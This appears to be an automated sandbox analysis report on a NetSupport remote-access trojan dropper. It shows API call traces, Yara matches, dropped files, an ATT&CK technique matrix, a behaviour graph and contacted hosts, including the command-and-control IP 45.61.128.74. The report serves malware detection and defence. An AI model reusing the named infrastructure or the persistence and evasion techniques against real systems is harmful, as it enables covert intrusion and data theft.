                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_11173D69
                                Source: C:\Users\Public\Netstat\shv.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11173CC6
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoA,6_2_1116B38E
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_11173933
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_111739DA
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_1117383E
                                Source: C:\Users\Public\Netstat\shv.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11173D2D
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_11173C06
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_6D1F1DB6
                                Source: C:\Users\Public\Netstat\shv.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_6D1FDC56
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoA,6_2_6D1FDC99
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_6D1F1CC1
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,6_2_6D1F0F39
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_6D1F1E5D
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_6D1F1EB8
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,6_2_6D1FDB7C
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,9_2_11173D69
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoA,9_2_1116B38E
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,9_2_11173933
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,9_2_111739DA
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_1117383E
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,9_2_11173A35
                                Source: C:\Users\Public\Netstat\shv.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_11173D2D
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,9_2_11173C06
                                Source: C:\Users\Public\Netstat\shv.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_11173CC6
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,6_2_110F33F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70E7B0754
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,6_2_1103B160
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,6_2_11174AE9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E794EB0 GetVersionExW,0_2_00007FF70E794EB0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,6_2_11070090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,6_2_110D8200
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1CA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,6_2_6D1CA980
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,9_2_11070090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,9_2_110D8200
                                Source: Yara matchFile source: 9.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.shv.exe.70030000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.shv.exe.74a90000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.229e94ad820.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.shv.exe.6d1c0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.2431151804.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5988, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 5552, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 6488, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 1936, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 4000, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 3360, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\shv.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting
                                2
                                Valid Accounts
                                1
                                Windows Management Instrumentation
                                1
                                Scripting
                                1
                                Exploitation for Privilege Escalation
                                1
                                Deobfuscate/Decode Files or Information
                                1
                                Input Capture
                                12
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                3
                                Obfuscated Files or Information
                                LSASS Memory1
                                Account Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                22
                                Encrypted Channel
                                Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Command and Scripting Interpreter
                                2
                                Valid Accounts
                                2
                                Valid Accounts
                                2
                                Software Packing
                                Security Account Manager2
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Input Capture
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution
                                1
                                Windows Service
                                21
                                Access Token Manipulation
                                1
                                DLL Side-Loading
                                NTDS44
                                System Information Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                4
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Registry Run Keys / Startup Folder
                                1
                                Windows Service
                                1
                                Masquerading
                                LSA Secrets251
                                Security Software Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts13
                                Process Injection
                                2
                                Valid Accounts
                                Cached Domain Credentials2
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Registry Run Keys / Startup Folder
                                1
                                Modify Registry
                                DCSync1
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Virtualization/Sandbox Evasion
                                Proc Filesystem11
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                                Process Injection
                                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562378 Sample: file.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 96 38 geo.netsupportsoftware.com 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Multi AV Scanner detection for dropped file 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 4 other signatures 2->52 8 file.exe 1 17 2->8         started        11 shv.exe 2->11         started        13 shv.exe 2->13         started        15 shv.exe 2->15         started        signatures3 process4 file5 30 C:\Users\Public30etstat\shv.exe, PE32 8->30 dropped 32 C:\Users\Public32etstat\remcmdstub.exe, PE32 8->32 dropped 34 C:\Users\Public34etstat\pcicapi.dll, PE32 8->34 dropped 36 6 other files (3 malicious) 8->36 dropped 17 cmd.exe 1 8->17         started        process6 signatures7 44 Uses cmd line tools excessively to alter registry or file data 17->44 20 shv.exe 17 17->20         started        24 shv.exe 17->24         started        26 conhost.exe 17->26         started        28 4 other processes 17->28 process8 dnsIp9 40 45.61.128.74, 443, 49708 M247GB United States 20->40 42 geo.netsupportsoftware.com 104.26.0.231, 49709, 80 CLOUDFLARENETUS United States 20->42 54 Multi AV Scanner detection for dropped file 20->54 56 Contains functionalty to change the wallpaper 20->56 58 Delayed program exit found 20->58 60 Contains functionality to detect sleep reduction / modifications 20->60 signatures10

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                file.exe39%ReversingLabsWin64.Trojan.NetSupport
                                SourceDetectionScannerLabelLink
                                C:\Users\Public\Netstat\HTCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICHEK.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICL32.DLL12%ReversingLabs
                                C:\Users\Public\Netstat\TCCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\msvcr100.dll0%ReversingLabs
                                C:\Users\Public\Netstat\pcicapi.dll3%ReversingLabs
                                C:\Users\Public\Netstat\remcmdstub.exe13%ReversingLabs
                                C:\Users\Public\Netstat\shv.exe29%ReversingLabsWin32.Trojan.NetSupport
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                http://45.61.128.74/fakeurl.htm0%Avira URL Cloudsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                104.26.0.231
                                truefalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  http://45.61.128.74/fakeurl.htmtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.pci.co.uk/supportfile.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                      high
                                      http://%s/testpage.htmwininet.dllfile.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                        high
                                        http://geo.netsupportsoftware.com/location/loca.aspcshv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                            high
                                            http://www.pci.co.uk/supportsupportfile.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                              high
                                              http://www.symauth.com/rpa00file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                high
                                                http://127.0.0.1RESUMEPRINTINGfile.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                  high
                                                  http://%s/testpage.htmfile.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                    high
                                                    http://geo.netsupportsoftware.com/location/loca.asp0shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://geo.netsupportsoftware.com/location/loca.aspUshv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.netsupportschool.com/tutor-assistant.asp11(file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                          high
                                                          http://127.0.0.1shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                            high
                                                            http://geo.netsupportsoftware.com/location/loca.aspishv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.symauth.com/cps0(file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                                high
                                                                http://www.netsupportschool.com/tutor-assistant.aspfile.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                                  high
